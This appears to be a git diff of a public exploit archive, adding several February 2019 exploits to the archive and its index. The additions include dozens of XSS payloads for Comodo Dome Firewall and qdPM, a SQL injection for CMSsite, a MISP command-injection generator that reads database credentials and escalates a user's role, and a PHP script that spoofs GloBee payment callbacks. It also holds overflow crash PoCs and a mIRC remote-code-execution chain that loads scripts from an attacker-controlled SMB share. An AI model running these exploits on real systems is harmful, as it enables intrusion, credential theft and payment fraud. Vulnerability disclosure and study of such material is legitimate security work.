"><script>alert(1)</script>
<div class="search-field">
<input type="text" value=""><script>alert(1)</script>"
id="viewsSearchInput" class="search-input" placeholder="Search..."/>
<i id="viewsSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS2 | Reflected & Stored - Save as
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
PATCH
PARAMETER
name
PAYLOAD
"><script>alert(2)</script>
#################################################################################
XSS3 | Stored - Delete query
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#queries
http://127.0.0.1:8529/_db/_system/_api/user/root
METHOD
Get
#################################################################################
XSS3 | Reflected & Stored - Add User
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
http://127.0.0.1:8529/_db/_system/_api/user
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#user/%22%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E
METHOD
Post
PARAMETER
user,name
PAYLOAD
"><script>alert(3)</script>
"><script>alert(4)</script>
#################################################################################
XSS5 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#users
PAYLOAD
"><script>alert(5)</script>
<div class="search-field">
<input type="text" value=""><script>alert(5)</script>"
id="userManagementSearchInput" class="search-input"
placeholder="Search..."/>
<!-- <img id="userManagementSearchSubmit" class="search-submit-icon">
-->
<i id="userManagementSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################
XSS6 | DOM Based XSS - Search
URL
http://127.0.0.1:8529/_db/_system/_admin/aardvark/index.html#databases
PAYLOAD
"><script>alert(6)</script>
<div class="search-field">
<input type="text" value=""><script>alert(6)</script>"
id="databaseSearchInput" class="search-input" placeholder="Search..."/>
<!-- <img id="databaseSearchSubmit" class="search-submit-icon">-->
<i id="databaseSearchSubmit" class="fa fa-search"></i>
</div>
#################################################################################

929
exploits/multiple/webapps/46408.txt Normal file
View file

@ -0,0 +1,929 @@
##################################################################################################################################
# Exploit Title: Comodo Dome Firewall 2.7.0 | Cross-Site Scripting
# Date: 18.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://cdome.comodo.com/firewall/
# Software Link: https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278
# Version: 2.7.0
##################################################################################################################################
Introduction
Comodo Dome Firewall (DFW) provides comprehensive security for enterprise
networks. The firewall software can be installed on a physical system or a
virtual machine.
Dome Firewall simplifies the overall management of network security by
delivering a single interface through which administrators can control
firewall policy, antivirus, intrusion prevention, website filtering,
traffic monitoring, VPN and proxy servers. Dome Firewall also features
highly configurable notifications, in-depth reporting and an informative
dashboard which offers a panoramic view of all major settings and network
events.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/korugan/login
METHOD
Post
PARAMETER
username
PAYLOAD
"><script>alert(1)</script>
#################################################################################
XSS2 | Stored
URL
https://192.168.2.200:10443/korugan/admin_profiles
METHOD
Post
PARAMETER
comment
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
admin_name
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS4 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
name
PAYLOAD
<script>alert(4)</script>
#################################################################################
XSS5 | Stored
URL
https://192.168.2.200:10443/korugan/admins
METHOD
Post
PARAMETER
surname
PAYLOAD
<script>alert(5)</script>
#################################################################################
XSS6 | Stored
URL
https://192.168.2.200:10443/korugan/license_activation
METHOD
Post
PARAMETER
newLicense
PAYLOAD
<script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/korugan/cmclient
METHOD
Post
PARAMETER
organization
PAYLOAD
"><script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/korugan/backupschedule
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
<script>alert(8)</script>
#################################################################################
XSS9 | Reflected
URL
https://192.168.2.200:10443/korugan/netwizard2
METHOD
Post
PARAMETER
netmask_addr
PAYLOAD
<script>alert(9)</script>
#################################################################################
XSS10 | Reflected
URL
https://192.168.2.200:10443/korugan/routing
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(10)</script>
#################################################################################
XSS11 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
source
PAYLOAD
<script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/korugan/policy_routing#createrule
METHOD
Post
PARAMETER
destination
PAYLOAD
<script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/korugan/dhcp
METHOD
Post
PARAMETER
GATEWAY_GREEN
PAYLOAD
<script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/korugan/time
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
<script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/ips/rules/?ACTION=policy&CONTROLLERNAME=&ID=%3Cscript%3Ealert(15)%3C/script%3E&policy=drop
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/ips/appid/?ACTION=enable&CONTROLLERNAME=&ID=%3Cscript%3Ealert(16)%3C/script%3E&enabled=off
METHOD
Get
PARAMETER
ID
PAYLOAD
<script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/korugan/hotspot_permanent_users
METHOD
Post
PARAMETER
MACADDRESSES
PAYLOAD
<script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
<script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
<script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/korugan/fwgroups
METHOD
Post
PARAMETER
FWADDRESSES
PAYLOAD
<script>alert(20)</script>
#################################################################################
XSS21 | Stored
URL
https://192.168.2.200:10443/korugan/schedule
METHOD
Post
PARAMETER
SCHNAME
PAYLOAD
<script>alert(21)</script>
#################################################################################
XSS22 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
port
PAYLOAD
<script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/korugan/snat
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
<script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
mac
PAYLOAD
<script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(25)</script>
#################################################################################
XSS26 | Stored
URL
https://192.168.2.200:10443/korugan/policyfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
target
PAYLOAD
<script>alert(27)</script>
#################################################################################
XSS28 | Stored
URL
https://192.168.2.200:10443/korugan/vpnfw
METHOD
Post
PARAMETER
remark
PAYLOAD
<script>alert(28)</script>
#################################################################################
XSS29 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
<script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
<script>alert(30)</script>
#################################################################################
XSS31 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
<script>alert(31)</script>
#################################################################################
XSS32 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
<script>alert(32)</script>
#################################################################################
XSS33 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
<script>alert(33)</script>
#################################################################################
XSS34 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
MIN_SIZE
PAYLOAD
<script>alert(34)</script>
#################################################################################
XSS35 | Reflected
URL
https://192.168.2.200:10443/korugan/proxyconfig
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
<script>alert(35)</script>
#################################################################################
XSS36 | Reflected
URL
https://192.168.2.200:10443/korugan/https_exceptions
METHOD
Post
PARAMETER
EXCEPTIONSITELIST
PAYLOAD
<script>alert(36)</script>
#################################################################################
XSS37 | Reflected
URL
https://192.168.2.200:10443/korugan/smtpconfig
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
<script>alert(37)</script>
#################################################################################
XSS38 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
<script>alert(38)</script>
#################################################################################
XSS39 | Reflected
URL
https://192.168.2.200:10443/korugan/dnsmasq
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
<script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_WHITELIST
PAYLOAD
<script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/korugan/antispyware
METHOD
Post
PARAMETER
DNSMASQ_BLACKLIST
PAYLOAD
<script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
remotenets
PAYLOAD
<script>alert(43)</script>
#################################################################################
XSS44 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
explicitroutes
PAYLOAD
<script>alert(44)</script>
#################################################################################
XSS45 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
static_ip
PAYLOAD
<script>alert(45)</script>
#################################################################################
XSS46 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_dns
PAYLOAD
<script>alert(46)</script>
#################################################################################
XSS47 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_users
METHOD
Post
PARAMETER
custom_domain
PAYLOAD
<script>alert(47)</script>
#################################################################################
XSS48 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_NETWORKS
PAYLOAD
<script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/korugan/openvpn_advanced
METHOD
Post
PARAMETER
GLOBAL_DNS
PAYLOAD
<script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/korugan/vpn_users
METHOD
Post
PARAMETER
username
PAYLOAD
<script>alert(50)</script>
#################################################################################

34
exploits/php/webapps/46398.txt Normal file
View file

@ -0,0 +1,34 @@
===========================================================================================
# Exploit Title: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391.
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : type
# Attack Pattern : tasks_columns_list<script>bKtx(9366)</script>
# GET Request: http://localhost/qdpm/index.php/configuration
===========================================================================================
GET
/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>
HTTP/1.1
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

36
exploits/php/webapps/46399.txt Normal file
View file

@ -0,0 +1,36 @@
===========================================================================================
# Exploit Title: qdPM 9.1 - 'search[keywords]' XSS Injection
# CVE: CVE-2019-8390
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : search[keywords]
# Attack Pattern : e"><script>zi2u(9111)</script>
# POST Request : http://localhost/qdpm/index.php/configuration
===========================================================================================
POST /qdpm/index.php/users HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9

57
exploits/php/webapps/46401.py Executable file
View file

@ -0,0 +1,57 @@
#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
#
# Use this payload as stix filename
def encode_data(data):
from base64 import b64encode
from urllib.parse import quote_plus
b64Data = b64encode(data.encode("utf-8"))
urlEncode = quote_plus(b64Data)
return urlEncode
def generate_payload(SQLRequest):
payload = 'MISPPath="../../";'\
'MISPPDB="$MISPPath/app/Config/database.php";'\
'MySQLUUser=$(grep -o -P "(?<=\'login\' => \').*(?=\')" $MISPPDB);'\
'MySQLRUser=${{MySQLRUser:-$MySQLUUser}};'\
'MySQLUPass=$(grep -o -P "(?<=\'password\' => \').*(?=\')" $MISPPDB);'\
'MySQLRPass=${{MySQLRPass:-$MySQLUPass}};'\
'MISPDB=$(grep -o -P "(?<=\'database\' => \').*(?=\')" $MISPPDB);'\
'mysql -u $MySQLRUser -p$MySQLRPass $MISPDB -e "{}"'
return payload.format(SQLRequest)
def generate_exploit(SQLRequest, **kwargs):
options = {
"inputFile" : kwargs.get("input_file", "data"),
"outputFile" : kwargs.get("output_file", "data2"),
"payload" : encode_data(generate_payload(SQLRequest))
}
exploit = "; echo '{payload}'>{inputFile};"\
"python3 -c 'import urllib.parse;"\
'fd=open(\\"{outputFile}\\",\\"w\\");'\
'fd.write(urllib.parse.unquote_plus(open(\\"{inputFile}\\").read()));'\
"fd.close()';"\
"base64 -d {outputFile}>{inputFile};"\
"sh {inputFile};"\
"rm {inputFile} {outputFile} #".format(**options)
return exploit
def main():
SQLRequest = "UPDATE users SET role_id=1 WHERE id = 2"
print(generate_exploit(SQLRequest))
if __name__ == "__main__":
main()

24
exploits/php/webapps/46402.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: CMSsite 1.0 - 'post' SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 17, 2019
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Tested Version: 1.0
# Tested on: Kali linux, Windows 8.1
# PoC:
# Vulnerable File: post.php
# Vulnerable Parameter : post
if (isset($_GET['post'])) {
$post = $_GET['post'];
}
$query = "SELECT * FROM posts WHERE post_id=$post";
$run_query = mysqli_query($con, $query);
# Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))

26
exploits/php/webapps/46405.txt Normal file
View file

@ -0,0 +1,26 @@
===========================================================================================
# Exploit Title: Webiness Inventory 2.3 - 'ProductModel' Arbitrary File Upload
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/
# Software Link: https://sourceforge.net/projects/webinessinventory/files/
# Version: 2.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: CVE-2019-8404
# Software Description: Small stock inventory managment application for web.
===========================================================================================
# POC:
# Sign in to admin panel. then go to the inventory tab.
Switch to the products tab and create a new product.
In product image, click the browse button and select a file.
https://i.hizliresim.com/OvrOOn.jpg
When you save the product, the script is loaded with the error file to
the server.
for example service unvailable
https://i.hizliresim.com/zjGqD4.jpg
path to the file we uploaded
https://i.hizliresim.com/XMbpp5.jpg
# http://localhost/[PATH]/runtime/ProductModel/[FILE]
===========================================================================================

93
exploits/php/webapps/46414.php Normal file
View file

@ -0,0 +1,93 @@
<?php
# Exploit Title: WordPress WooCommerce - GloBee (cryptocurrency) Payment Gateway Plugin [Payment Bypass / Unauthorized Order Status Spoofing]
# Discovery Date: 14.12.2018
# Public Disclosure Date: 14.02.2019
# Exploit Author: GeekHack
# Contact: https://t.me/GeekHack
# Vendor Homepage: https://globee.com/ (previously payb.ee)
# Software Link: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/releases/tag/v1.1.1
# Version: <= 1.1.1
# Tested on: WordPress 4.9.9 + WooCommerce 3.5.1 + GloBee Payment Gateway Plugin 1.1.1
# CVE: CVE-2018-20782
/*
Description:
Reliance on untrusted inputs (CWE-807), insufficient data verification and lack of any cryptographic authentication (hmac etc) at IPN callback (ipn_callback() function in Gateway.php at 374 line) allow remote (even unauthorized) attacker to bypass payment process and spoof real order status without actually paying for it.
[code ref: https://github.com/GloBee-Official/woocommerce-payment-api-plugin/blob/8c254d6100ef4cfb3432b219726f4936c1531234/src/Gateway.php#L374]
Such actions like 'changin order status' normally require administrative rights. But in this case anyone can perform these actions, even with the most limited rights, therefor this issue "can" also be considered as a Privilege Escalation (CWE-269) vulnerability (but it's not quite right, imho).
*/
if(php_sapi_name() !== 'cli')
die('Use CLI: php '.__FILE__);
if(!extension_loaded('curl'))
die('cURL extension is required');
echo 'Payment Bypass (CVE-2018-20782) PoC by GeekHack team.'."\n";
echo 'Select any product(s) in a vulnerable store and continue checkout through payment via cryptocurrencies (GloBee Payment Gateway).'."\n\n";
$shopURL = rtrim(readline('Shop root URL (https://shop.example.com/): '), '/');
if(strpos(@get_headers($shopURL)[0], '200') === false)
die('Shop url is invalid or not exists (or request was blocked), check link format and try again.');
$paymentLink = readline('Payment link (https://globee.com/en/payment-request/XXXXXXXXXXXXXXXXXXXXXX): ');
if(preg_match('/https:\/\/globee\.com\/en\/payment-request\/(\w*)/', $paymentLink, $matches)) {
$paymentID = $matches[1];
}else{
die('Payment link is invalid, check link format and try again.');
}
$orderID = (int)readline('Order ID: ');
if(!$orderID)
die('Order ID is invalid, must be a positive integer, try again.');
$payload = [ // commented fields are not required for exploitation
'id' => $paymentID,
'status' => 'completed',
//'total' => '123.45',
//'currency' => "USD",
'custom_payment_id' => $orderID,
//'callback_data' => "example data",
/*'customer' => [
'name' => 'John Smit',
'email' => 'john.smit@hotmail.com'
],*/
/*'payment_details' => [
'currency' => 'BTC'
],*/
//'redirect_url' => 'http://globee.com/invoice/'.$paymentID,
//'success_url' => $shopURL,
//'cancel_url' => $shopURL,
//'ipn_url' => $shopURL.'/wc-api/globee_ipn_callback',
//'notification_email' => null,
//'confirmation_speed' => 'medium',
//'expires_at' => '2018-01-25 12:31:04',
//'created_at' => '2018-01-25 12:16:04'
];
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => $shopURL.'/wc-api/globee_ipn_callback',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_ENCODING => "",
CURLOPT_MAXREDIRS => 2,
CURLOPT_TIMEOUT => 10,
CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
CURLOPT_CUSTOMREQUEST => 'POST',
CURLOPT_POSTFIELDS => json_encode($payload),
CURLOPT_HTTPHEADER => array(
'cache-control: no-cache',
'content-type: application/json',
),
));
$response = curl_exec($curl);
$err = curl_error($curl);
curl_close($curl);
if ($err) {
echo 'cURL Error #: '.$err;
} else {
echo 'Done: '.$response;
}

22
exploits/windows/dos/46390.py Executable file
View file

@ -0,0 +1,22 @@
# -*- coding: utf-8 -*-
# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Port' Denial of Service (PoC)
# Date: 15/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/
# Version: 2.0.0.70
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "RealTerm.py", it will create a new file "PoC.txt"
# 2.- Copy the content of the new file 'PoC.txt' to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> open
# 7.- Crashed
buffer = "\x41" * 1000
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()

40
exploits/windows/dos/46391.py Executable file
View file

@ -0,0 +1,40 @@
# -*- coding: utf-8 -*-
# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Overflow Crash (SEH) (PoC)
# Date: 16/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/
# Version: 2.0.0.70
# Tested on: Windows 10 / Windows XP
# Proof of Concept:
# 1.- Run the python script "EchoPort.py", it will create a new file "EchoPort.txt"
# 2.- Copy the content of the new file 'EchoPort.txt' to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or
# 8.- Crashed
# After the execution of POC, the SEH chain looks like this:
# 0012F57C 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#0012F568 41414141 AAAA
#0012F56C 41414141 AAAA
#0012F570 41414141 AAAA
#0012F574 41414141 AAAA
#0012F578 42424242 BBBB Pointer to next SEH record
#0012F57C 43434343 CCCC SE handler
buffer = "\x41" * 268
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("EchoPort.txt", "w")
f.write(buffer+nseh+seh)
f.close()

23
exploits/windows/dos/46403.py Executable file
View file

@ -0,0 +1,23 @@
# -*- coding: utf-8 -*-
# Exploit Title: NBMonitor 1.6.5 - 'Key' Denial of Service (PoC)
# Date: 15/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.5.0
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "NBMonitor.py", it will create a new file "PoC.txt"
# 2.- Copy the text from the generated PoC.txt file to clipboard
# 3.- Open NBMonitor.exe
# 4.- Go to Register > Enter Registration Code...
# 5.- Write anything in 'Name' field
# 6.- Paste clipboard in 'Key' field
# 7.- Click on button -> Ok
# 8.- Crashed
buffer = "\x41" * 256
f = open ("PoC.txt", "w")
f.write(buffer)
f.close()

100
exploits/windows/remote/46392.txt Normal file
View file

@ -0,0 +1,100 @@
# Exploit Title: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers
# Date: 18/02/2019
# Exploit Author: https://twitter.com/proofofcalc/
# Vendor Homepage: https://www.mirc.com
# Software Link: https://www.mirc.com/get.php
# Version: < 7.55
# Tested on: Windows
# CVE : CVE-2019-6453
RCE through URI protocol handlers on mIRC <7.55 (CVE-2019-6453)
===============================================================
Severity: High
mIRC has been shown to be vulnerable to argument injection through its
associated URI protocol handlers that improperly escape their parameters.
Usingavailable command-line parameters, an attacker is able to load a remote
configuration file and to automatically run arbitrary code.
Because mIRC doesn't use any kind of sigil such as -- to mark
the end of the argument list, an attacker is able to pass arguments to mIRC
through a irc:// link and execute arbitrary code by loading a custom
mirc.ini
from an attacker-controlled Samba file server. Please note that ircs://
works
the same way.
PoC
===
The proof of calc requires three files: mirc.ini, calc.ini and poc.html.
We assume a Samba file server is running on the attacker's side. For the
sake of the example, the following pieces of code assume it is running on
host 127.0.0.1 (i.e. replace 127.0.0.1 by your own server's address in
the following files to try this out).
mirc.ini
========
mirc.ini is a custom configuration file that should be located at
C:\mirc-poc\mirc.ini
on the file server.
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini
calc.ini
========
calc.ini is a remote script file that should be located at
C:\mirc-poc\calc.ini on the
file server.
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}
poc.html
========
Just visiting poc.html should work assuming mIRC is set as the default
handler for the
irc:// URI scheme and the browser does not encode the payload. Depending
on the browser
and your configuration, you might still get a prompt (not the case on
Firefox).
<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini' />
Affected versions
=================
This PoC runs for mIRC <7.55.
You can trigger the PoC on Edge 42.17134 (last preview version) and
Firefox 64.0.2
(last release). It doesn't work on Chrome because the way Chrome handle
URI protocols
(URI is encoded before being passed to the application).
References
==========
Further explanation (including proof of concept code):
Write-up:
https://proofofcalc.com/cve-2019-6453-mIRC/
PoC:
https://github.com/proofofcalc/cve-2019-6453-poc
mIRC changelog:
https://www.mirc.com/whatsnew.txt
Authors
=======
Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)

20
files_exploits.csv
View file

@ -6315,6 +6315,13 @@ id,file,description,date,author,type,platform,port
46383,exploits/windows/dos/46383.py,"Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)",2019-02-15,"Victor Mondragón",dos,windows,
46385,exploits/windows/dos/46385.py,"VSCO 1.1.1.0 - Denial of Service (PoC)",2019-02-15,0xB9,dos,windows,
46388,exploits/linux/dos/46388.txt,"Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference",2019-02-15,"Google Security Research",dos,linux,
46390,exploits/windows/dos/46390.py,"Realterm Serial Terminal 2.0.0.70 - Denial of Service",2019-02-18,"Alejandra Sánchez",dos,windows,
46391,exploits/windows/dos/46391.py,"Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)",2019-02-18,"Alejandra Sánchez",dos,windows,
46403,exploits/windows/dos/46403.py,"NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)",2019-02-18,"Alejandra Sánchez",dos,windows,
46409,exploits/java/dos/46409.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During OTF Font Rendering in glyph_CloseContour",2019-02-18,"Google Security Research",dos,java,
46410,exploits/java/dos/46410.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in OpenTypeLayoutEngine::adjustGlyphPositions",2019-02-18,"Google Security Research",dos,java,
46411,exploits/java/dos/46411.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in ExtractBitMap_blocClass",2019-02-18,"Google Security Research",dos,java,
46412,exploits/java/dos/46412.txt,"Oracle Java Runtime Environment - Heap Out-of-Bounds Read During TTF Font Rendering in AlternateSubstitutionSubtable::process",2019-02-18,"Google Security Research",dos,java,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17185,6 +17192,7 @@ id,file,description,date,author,type,platform,port
46339,exploits/osx/remote/46339.rb,"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)",2019-02-11,Metasploit,remote,osx,
46340,exploits/php/remote/46340.rb,"NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)",2019-02-11,Metasploit,remote,php,80
46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple,
46392,exploits/windows/remote/46392.txt,"mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers",2019-02-18,ProofOfCalc,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40851,3 +40859,15 @@ id,file,description,date,author,type,platform,port
46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,
